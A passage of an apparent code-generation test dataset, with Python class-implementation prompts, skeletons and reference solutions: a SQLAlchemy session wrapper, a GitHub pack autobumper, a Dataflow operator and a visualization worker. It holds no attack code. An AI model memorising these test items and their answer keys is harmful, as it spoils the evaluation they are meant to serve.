session_maker.maker\n<|end_body_0|>\n\n<|body_start_1|>\n session = self.maker()\n try:\n yield session\n session.commit()\n except Skip:\n session.rollback()\n raise\n except Exception:\n self.logger.error('Transaction failed. Rolling back.')\n session.rollback()\n raise\n finally:\n session.close()\n<|end_body_1|>\n", "class_docstring": "A wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.", "class_name": "Session", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Session:\n \"\"\"A wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\"\"\"\n\n def __init__(self, session_maker):\n \"\"\"Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\"\"\"\n <|body_0|>\n\n def __call__(self):\n \"\"\"Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = logging.getLogger('core.Session')\n self.maker = session_maker\n if isinstance(session_maker, Session):\n self.maker = session_maker.maker\n<|end_body_0|>\n\n<|body_start_1|>\n session = self.maker()\n try:\n yield session\n session.commit()\n except Skip:\n session.rollback()\n raise\n except Exception:\n self.logger.error('Transaction failed. 
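
The nextPermutation record's preferred method is the two-pass scan: find the rightmost ascent, swap its left element with the smallest larger element in the suffix, then reverse the suffix. A compact restatement with quick checks (equivalent logic, slightly tightened loop conditions):

```python
def next_permutation(nums):
    i = len(nums) - 2
    while i >= 0 and nums[i] >= nums[i + 1]:   # 1) rightmost ascent
        i -= 1
    if i >= 0:
        j = len(nums) - 1
        while nums[j] <= nums[i]:              # 2) smallest element > nums[i] in suffix
            j -= 1
        nums[i], nums[j] = nums[j], nums[i]
    nums[i + 1:] = reversed(nums[i + 1:])      # 3) suffix was descending; flip it
    return nums

assert next_permutation([1, 2, 3]) == [1, 3, 2]
assert next_permutation([1, 1, 5]) == [1, 5, 1]
assert next_permutation([3, 2, 1]) == [1, 2, 3]   # wraps to the smallest ordering
```
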
Rolling back.')\n session.rollback()\n raise\n finally:\n session.close()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000145", "length_bytes": 1777, "license_type": "no_license", "methods": [{"docstring": "Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.", "name": "__init__", "signature": "def __init__(self, session_maker)"}, {"docstring": "Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.", "name": "__call__", "signature": "def __call__(self)"}], "n_methods": 2, "prompt": "Implement the Python class `Session` described below.\n\nClass description:\nA wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\n\nMethod signatures and docstrings:\n- def __init__(self, session_maker): Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\n- def __call__(self): Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.", "prompted_full_text": "Implement the Python class `Session` described below.\n\nClass description:\nA wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\n\nMethod signatures and docstrings:\n- def __init__(self, session_maker): Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\n- def __call__(self): Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.\n\n<|skeleton|>\nclass Session:\n \"\"\"A wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\"\"\"\n\n def __init__(self, session_maker):\n \"\"\"Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\"\"\"\n <|body_0|>\n\n def __call__(self):\n \"\"\"Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. 
Yields ------ session : Session A session that will be closed outside of the context.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = logging.getLogger('core.Session')\n self.maker = session_maker\n if isinstance(session_maker, Session):\n self.maker = session_maker.maker\n<|end_body_0|>\n\n<|body_start_1|>\n session = self.maker()\n try:\n yield session\n session.commit()\n except Skip:\n session.rollback()\n raise\n except Exception:\n self.logger.error('Transaction failed. Rolling back.')\n session.rollback()\n raise\n finally:\n session.close()\n<|end_body_1|>\n", "revision_id": "1982e10a56885e56d79aac69365b9ff78c0e3d92", "skeleton": "<|skeleton|>\nclass Session:\n \"\"\"A wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\"\"\"\n\n def __init__(self, session_maker):\n \"\"\"Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\"\"\"\n <|body_0|>\n\n def __call__(self):\n \"\"\"Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Session:\n \"\"\"A wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\"\"\"\n\n def __init__(self, session_maker):\n \"\"\"Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\"\"\"\n self.logger = logging.getLogger('core.Session')\n self.maker = session_maker\n if isinstance(session_maker, Session):\n self.maker = session_maker.maker\n\n def __call__(self):\n \"\"\"Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.\"\"\"\n session = self.maker()\n try:\n yield session\n session.commit()\n except Skip:\n session.rollback()\n raise\n except Exception:\n self.logger.error('Transaction failed. 
Rolling back.')\n session.rollback()\n raise\n finally:\n session.close()\n", "source": "the_stack_v2_python_sparse", "source_path": "pymotifs/core/db.py", "source_repo": "BGSU-RNA/RNA-3D-Hub-core", "split": "test", "star_events_count": 3} {"blob_id": "1c09e2ced8ed33aaf69f92e353bcdee1631818af", "bodies": ["assert packs_to_autobump, f'packs_to_autobump in the pr: {pr.number}, cant be empty.'\nself.pr = pr\nself.branch = pr.head.ref\nself.git_repo = git_repo\nself.packs_to_autobump = packs_to_autobump\nself.github_run_id = run_id", "body = PR_COMMENT_TITLE.format(self.github_run_id)\nwith Checkout(self.git_repo, self.branch):\n for pack_auto_bumper in self.packs_to_autobump:\n pack_auto_bumper.set_pr_changed_rn_related_data()\n self.git_repo.git.merge(f'origin/{BASE}', '-Xtheirs', '-m', MERGE_FROM_MASTER_COMMIT_MESSAGE)\n for pack_auto_bumper in self.packs_to_autobump:\n new_version = pack_auto_bumper.autobump()\n print(f'Pack {pack_auto_bumper.pack_id} new version: {new_version}.')\n self.git_repo.git.add(f'{PACKS_DIR}/{pack_auto_bumper.pack_id}')\n self.git_repo.git.commit('-m', COMMIT_MESSAGE.format(pack_auto_bumper.pack_id, new_version))\n body += PR_COMMENT.format(pack_auto_bumper.pack_id, new_version)\n print(f'[{self.pr.number}] Committed the changes. Commenting on the pr: \\n{body}.\\n')\n body += PR_COMMENT_STOP_AUTOMATION\n self.git_repo.git.push()\n self.pr.create_issue_comment(body)\nreturn body"], "bodies_text": "<|body_start_0|>\n assert packs_to_autobump, f'packs_to_autobump in the pr: {pr.number}, cant be empty.'\n self.pr = pr\n self.branch = pr.head.ref\n self.git_repo = git_repo\n self.packs_to_autobump = packs_to_autobump\n self.github_run_id = run_id\n<|end_body_0|>\n\n<|body_start_1|>\n body = PR_COMMENT_TITLE.format(self.github_run_id)\n with Checkout(self.git_repo, self.branch):\n for pack_auto_bumper in self.packs_to_autobump:\n pack_auto_bumper.set_pr_changed_rn_related_data()\n self.git_repo.git.merge(f'origin/{BASE}', '-Xtheirs', '-m', MERGE_FROM_MASTER_COMMIT_MESSAGE)\n for pack_auto_bumper in self.packs_to_autobump:\n new_version = pack_auto_bumper.autobump()\n print(f'Pack {pack_auto_bumper.pack_id} new version: {new_version}.')\n self.git_repo.git.add(f'{PACKS_DIR}/{pack_auto_bumper.pack_id}')\n self.git_repo.git.commit('-m', COMMIT_MESSAGE.format(pack_auto_bumper.pack_id, new_version))\n body += PR_COMMENT.format(pack_auto_bumper.pack_id, new_version)\n print(f'[{self.pr.number}] Committed the changes. Commenting on the pr: \\n{body}.\\n')\n body += PR_COMMENT_STOP_AUTOMATION\n self.git_repo.git.push()\n self.pr.create_issue_comment(body)\n return body\n<|end_body_1|>\n", "class_docstring": "", "class_name": "BranchAutoBumper", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BranchAutoBumper:\n\n def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str):\n \"\"\"Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\"\"\"\n <|body_0|>\n\n def autobump(self):\n \"\"\"AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. 
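
The Session record's `__call__` is a generator, so in the original code it is presumably decorated with `contextlib.contextmanager` (the decorator is not visible in the record). A minimal standalone version of the same commit/rollback/close discipline, with a fake session to show the flow (`Skip` is a stand-in for the pipeline's exception, assumed rather than taken from the record):

```python
import contextlib
import logging

logger = logging.getLogger("core.Session")

class Skip(Exception):
    """Stand-in for the pipeline's Skip exception."""

@contextlib.contextmanager
def session_scope(maker):
    session = maker()
    try:
        yield session
        session.commit()           # only reached if the body raised nothing
    except Skip:
        session.rollback()         # expected control flow: roll back quietly
        raise
    except Exception:
        logger.error("Transaction failed. Rolling back.")
        session.rollback()
        raise
    finally:
        session.close()            # always runs, success or failure

class _FakeSession:
    def commit(self): print("commit")
    def rollback(self): print("rollback")
    def close(self): print("close")

with session_scope(_FakeSession) as s:
    pass   # prints: commit, close
```
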
Pushes the changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert packs_to_autobump, f'packs_to_autobump in the pr: {pr.number}, cant be empty.'\n self.pr = pr\n self.branch = pr.head.ref\n self.git_repo = git_repo\n self.packs_to_autobump = packs_to_autobump\n self.github_run_id = run_id\n<|end_body_0|>\n\n<|body_start_1|>\n body = PR_COMMENT_TITLE.format(self.github_run_id)\n with Checkout(self.git_repo, self.branch):\n for pack_auto_bumper in self.packs_to_autobump:\n pack_auto_bumper.set_pr_changed_rn_related_data()\n self.git_repo.git.merge(f'origin/{BASE}', '-Xtheirs', '-m', MERGE_FROM_MASTER_COMMIT_MESSAGE)\n for pack_auto_bumper in self.packs_to_autobump:\n new_version = pack_auto_bumper.autobump()\n print(f'Pack {pack_auto_bumper.pack_id} new version: {new_version}.')\n self.git_repo.git.add(f'{PACKS_DIR}/{pack_auto_bumper.pack_id}')\n self.git_repo.git.commit('-m', COMMIT_MESSAGE.format(pack_auto_bumper.pack_id, new_version))\n body += PR_COMMENT.format(pack_auto_bumper.pack_id, new_version)\n print(f'[{self.pr.number}] Committed the changes. Commenting on the pr: \\n{body}.\\n')\n body += PR_COMMENT_STOP_AUTOMATION\n self.git_repo.git.push()\n self.pr.create_issue_comment(body)\n return body\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000146", "length_bytes": 11815, "license_type": "permissive", "methods": [{"docstring": "Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.", "name": "__init__", "signature": "def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str)"}, {"docstring": "AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.", "name": "autobump", "signature": "def autobump(self)"}], "n_methods": 2, "prompt": "Implement the Python class `BranchAutoBumper` described below.\n\nClass description:\nImplement the BranchAutoBumper class.\n\nMethod signatures and docstrings:\n- def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str): Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\n- def autobump(self): AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.", "prompted_full_text": "Implement the Python class `BranchAutoBumper` described below.\n\nClass description:\nImplement the BranchAutoBumper class.\n\nMethod signatures and docstrings:\n- def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str): Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\n- def autobump(self): AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. 
AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.\n\n<|skeleton|>\nclass BranchAutoBumper:\n\n def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str):\n \"\"\"Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\"\"\"\n <|body_0|>\n\n def autobump(self):\n \"\"\"AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert packs_to_autobump, f'packs_to_autobump in the pr: {pr.number}, cant be empty.'\n self.pr = pr\n self.branch = pr.head.ref\n self.git_repo = git_repo\n self.packs_to_autobump = packs_to_autobump\n self.github_run_id = run_id\n<|end_body_0|>\n\n<|body_start_1|>\n body = PR_COMMENT_TITLE.format(self.github_run_id)\n with Checkout(self.git_repo, self.branch):\n for pack_auto_bumper in self.packs_to_autobump:\n pack_auto_bumper.set_pr_changed_rn_related_data()\n self.git_repo.git.merge(f'origin/{BASE}', '-Xtheirs', '-m', MERGE_FROM_MASTER_COMMIT_MESSAGE)\n for pack_auto_bumper in self.packs_to_autobump:\n new_version = pack_auto_bumper.autobump()\n print(f'Pack {pack_auto_bumper.pack_id} new version: {new_version}.')\n self.git_repo.git.add(f'{PACKS_DIR}/{pack_auto_bumper.pack_id}')\n self.git_repo.git.commit('-m', COMMIT_MESSAGE.format(pack_auto_bumper.pack_id, new_version))\n body += PR_COMMENT.format(pack_auto_bumper.pack_id, new_version)\n print(f'[{self.pr.number}] Committed the changes. Commenting on the pr: \\n{body}.\\n')\n body += PR_COMMENT_STOP_AUTOMATION\n self.git_repo.git.push()\n self.pr.create_issue_comment(body)\n return body\n<|end_body_1|>\n", "revision_id": "890def5a0e0ae8d6eaa538148249ddbc851dbb6b", "skeleton": "<|skeleton|>\nclass BranchAutoBumper:\n\n def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str):\n \"\"\"Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\"\"\"\n <|body_0|>\n\n def autobump(self):\n \"\"\"AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BranchAutoBumper:\n def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str):\n \"\"\"Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. 
run_id: GitHub action run id.\"\"\"\n assert packs_to_autobump, f'packs_to_autobump in the pr: {pr.number}, cant be empty.'\n self.pr = pr\n self.branch = pr.head.ref\n self.git_repo = git_repo\n self.packs_to_autobump = packs_to_autobump\n self.github_run_id = run_id\n\n def autobump(self):\n \"\"\"AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.\"\"\"\n body = PR_COMMENT_TITLE.format(self.github_run_id)\n with Checkout(self.git_repo, self.branch):\n for pack_auto_bumper in self.packs_to_autobump:\n pack_auto_bumper.set_pr_changed_rn_related_data()\n self.git_repo.git.merge(f'origin/{BASE}', '-Xtheirs', '-m', MERGE_FROM_MASTER_COMMIT_MESSAGE)\n for pack_auto_bumper in self.packs_to_autobump:\n new_version = pack_auto_bumper.autobump()\n print(f'Pack {pack_auto_bumper.pack_id} new version: {new_version}.')\n self.git_repo.git.add(f'{PACKS_DIR}/{pack_auto_bumper.pack_id}')\n self.git_repo.git.commit('-m', COMMIT_MESSAGE.format(pack_auto_bumper.pack_id, new_version))\n body += PR_COMMENT.format(pack_auto_bumper.pack_id, new_version)\n print(f'[{self.pr.number}] Committed the changes. Commenting on the pr: \\n{body}.\\n')\n body += PR_COMMENT_STOP_AUTOMATION\n self.git_repo.git.push()\n self.pr.create_issue_comment(body)\n return body\n", "source": "the_stack_v2_python_sparse", "source_path": "Utils/github_workflow_scripts/autobump_release_notes/autobump_rn.py", "source_repo": "demisto/content", "split": "test", "star_events_count": 1023} {"blob_id": "1ab7dcae5997e06b05eecfc318af2c4b1b7d72dd", "bodies": ["old_pypath = os.environ.get('PYTHONPATH', '')\nif not old_pypath:\n pypath = python_path\nelif python_path in old_pypath:\n pypath = old_pypath\nelse:\n pypath = old_pypath + ':' + python_path\nos.environ['PYTHONPATH'] = pypath\nself.dataflow_hook = dataflow_hook\nsuper().__init__(**kwargs)", "bucket_helper = dataflow_operator.GoogleCloudBucketHelper(self.gcp_conn_id, self.delegate_to)\nself.py_file = bucket_helper.google_cloud_to_local(self.py_file)\nif self.dataflow_hook is None:\n self.dataflow_hook = dataflow_py3_hook.DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to, poll_sleep=self.poll_sleep)\ndataflow_options = self.dataflow_default_options.copy()\ndataflow_options.update(self.options)\nformatted_options = {_camel_to_snake(key): dataflow_options[key] for key in dataflow_options}\nself.dataflow_hook.start_python_dataflow(self.task_id, formatted_options, self.py_file, self.py_options)"], "bodies_text": "<|body_start_0|>\n old_pypath = os.environ.get('PYTHONPATH', '')\n if not old_pypath:\n pypath = python_path\n elif python_path in old_pypath:\n pypath = old_pypath\n else:\n pypath = old_pypath + ':' + python_path\n os.environ['PYTHONPATH'] = pypath\n self.dataflow_hook = dataflow_hook\n super().__init__(**kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n bucket_helper = dataflow_operator.GoogleCloudBucketHelper(self.gcp_conn_id, self.delegate_to)\n self.py_file = bucket_helper.google_cloud_to_local(self.py_file)\n if self.dataflow_hook is None:\n self.dataflow_hook = dataflow_py3_hook.DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to, poll_sleep=self.poll_sleep)\n dataflow_options = self.dataflow_default_options.copy()\n dataflow_options.update(self.options)\n formatted_options = {_camel_to_snake(key): 
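
The BranchAutoBumper record leans on a `Checkout` context manager whose implementation is not shown. One plausible shape, sketched here with GitPython's `Repo` API (this is an assumption about the helper, not the project's actual code): check the branch out on enter, restore the previous branch on exit even if the body raises.

```python
import contextlib

@contextlib.contextmanager
def checkout(git_repo, branch):
    previous = git_repo.active_branch.name   # remember where we were
    git_repo.git.checkout(branch)
    try:
        yield
    finally:
        git_repo.git.checkout(previous)      # restore even on failure
```
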
dataflow_options[key] for key in dataflow_options}\n self.dataflow_hook.start_python_dataflow(self.task_id, formatted_options, self.py_file, self.py_options)\n<|end_body_1|>\n", "class_docstring": "A Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.", "class_name": "DataFlowPythonOperator", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DataFlowPythonOperator:\n \"\"\"A Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\"\"\"\n\n def __init__(self, python_path='', dataflow_hook=None, **kwargs):\n \"\"\"Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the python dataflow job.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n old_pypath = os.environ.get('PYTHONPATH', '')\n if not old_pypath:\n pypath = python_path\n elif python_path in old_pypath:\n pypath = old_pypath\n else:\n pypath = old_pypath + ':' + python_path\n os.environ['PYTHONPATH'] = pypath\n self.dataflow_hook = dataflow_hook\n super().__init__(**kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n bucket_helper = dataflow_operator.GoogleCloudBucketHelper(self.gcp_conn_id, self.delegate_to)\n self.py_file = bucket_helper.google_cloud_to_local(self.py_file)\n if self.dataflow_hook is None:\n self.dataflow_hook = dataflow_py3_hook.DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to, poll_sleep=self.poll_sleep)\n dataflow_options = self.dataflow_default_options.copy()\n dataflow_options.update(self.options)\n formatted_options = {_camel_to_snake(key): dataflow_options[key] for key in dataflow_options}\n self.dataflow_hook.start_python_dataflow(self.task_id, formatted_options, self.py_file, self.py_options)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000147", "length_bytes": 3015, "license_type": "permissive", "methods": [{"docstring": "Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.", "name": "__init__", "signature": "def __init__(self, python_path='', dataflow_hook=None, **kwargs)"}, {"docstring": "Execute the python dataflow job.", "name": "execute", "signature": "def execute(self, context)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005952", "prompt": "Implement the Python class `DataFlowPythonOperator` described below.\n\nClass description:\nA Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\n\nMethod signatures and docstrings:\n- def __init__(self, python_path='', dataflow_hook=None, **kwargs): Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. 
**kwargs: Additional args for super class.\n- def execute(self, context): Execute the python dataflow job.", "prompted_full_text": "Implement the Python class `DataFlowPythonOperator` described below.\n\nClass description:\nA Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\n\nMethod signatures and docstrings:\n- def __init__(self, python_path='', dataflow_hook=None, **kwargs): Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\n- def execute(self, context): Execute the python dataflow job.\n\n<|skeleton|>\nclass DataFlowPythonOperator:\n \"\"\"A Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\"\"\"\n\n def __init__(self, python_path='', dataflow_hook=None, **kwargs):\n \"\"\"Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the python dataflow job.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n old_pypath = os.environ.get('PYTHONPATH', '')\n if not old_pypath:\n pypath = python_path\n elif python_path in old_pypath:\n pypath = old_pypath\n else:\n pypath = old_pypath + ':' + python_path\n os.environ['PYTHONPATH'] = pypath\n self.dataflow_hook = dataflow_hook\n super().__init__(**kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n bucket_helper = dataflow_operator.GoogleCloudBucketHelper(self.gcp_conn_id, self.delegate_to)\n self.py_file = bucket_helper.google_cloud_to_local(self.py_file)\n if self.dataflow_hook is None:\n self.dataflow_hook = dataflow_py3_hook.DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to, poll_sleep=self.poll_sleep)\n dataflow_options = self.dataflow_default_options.copy()\n dataflow_options.update(self.options)\n formatted_options = {_camel_to_snake(key): dataflow_options[key] for key in dataflow_options}\n self.dataflow_hook.start_python_dataflow(self.task_id, formatted_options, self.py_file, self.py_options)\n<|end_body_1|>\n", "revision_id": "29b40262cf0bb5ef39b91765a074fe76fc2c8e03", "skeleton": "<|skeleton|>\nclass DataFlowPythonOperator:\n \"\"\"A Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\"\"\"\n\n def __init__(self, python_path='', dataflow_hook=None, **kwargs):\n \"\"\"Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the python dataflow job.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DataFlowPythonOperator:\n \"\"\"A Dataflow Operator to run py3 jobs. 
This operator patches `dataflow_operator.DataFlowPythonOperator` and calls `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\"\"\"\n\n def __init__(self, python_path='', dataflow_hook=None, **kwargs):\n \"\"\"Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\"\"\"\n old_pypath = os.environ.get('PYTHONPATH', '')\n if not old_pypath:\n pypath = python_path\n elif python_path in old_pypath:\n pypath = old_pypath\n else:\n pypath = old_pypath + ':' + python_path\n os.environ['PYTHONPATH'] = pypath\n self.dataflow_hook = dataflow_hook\n super().__init__(**kwargs)\n\n def execute(self, context):\n \"\"\"Execute the python dataflow job.\"\"\"\n bucket_helper = dataflow_operator.GoogleCloudBucketHelper(self.gcp_conn_id, self.delegate_to)\n self.py_file = bucket_helper.google_cloud_to_local(self.py_file)\n if self.dataflow_hook is None:\n self.dataflow_hook = dataflow_py3_hook.DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to, poll_sleep=self.poll_sleep)\n dataflow_options = self.dataflow_default_options.copy()\n dataflow_options.update(self.options)\n formatted_options = {_camel_to_snake(key): dataflow_options[key] for key in dataflow_options}\n self.dataflow_hook.start_python_dataflow(self.task_id, formatted_options, self.py_file, self.py_options)\n", "source": "the_stack_v2_python_sparse", "source_path": "contrib/plugins/operators/dataflow_py3_operator.py", "source_repo": "Ressmann/driblet", "split": "test", "star_events_count": 0} {"blob_id": "d0622ec9a9fb891ae2c9a0a875e3f0e5666725ed", "bodies": ["self.video_vis = video_vis\nself.task_queue = task_queue\nself.result_queue = result_queue\nsuper().__init__()", "while True:\n task = self.task_queue.get()\n if isinstance(task, _StopToken):\n break\n frames = draw_predictions(task, self.video_vis)\n task.frames = np.array(frames)\n self.result_queue.put(task)"], "bodies_text": "<|body_start_0|>\n self.video_vis = video_vis\n self.task_queue = task_queue\n self.result_queue = result_queue\n 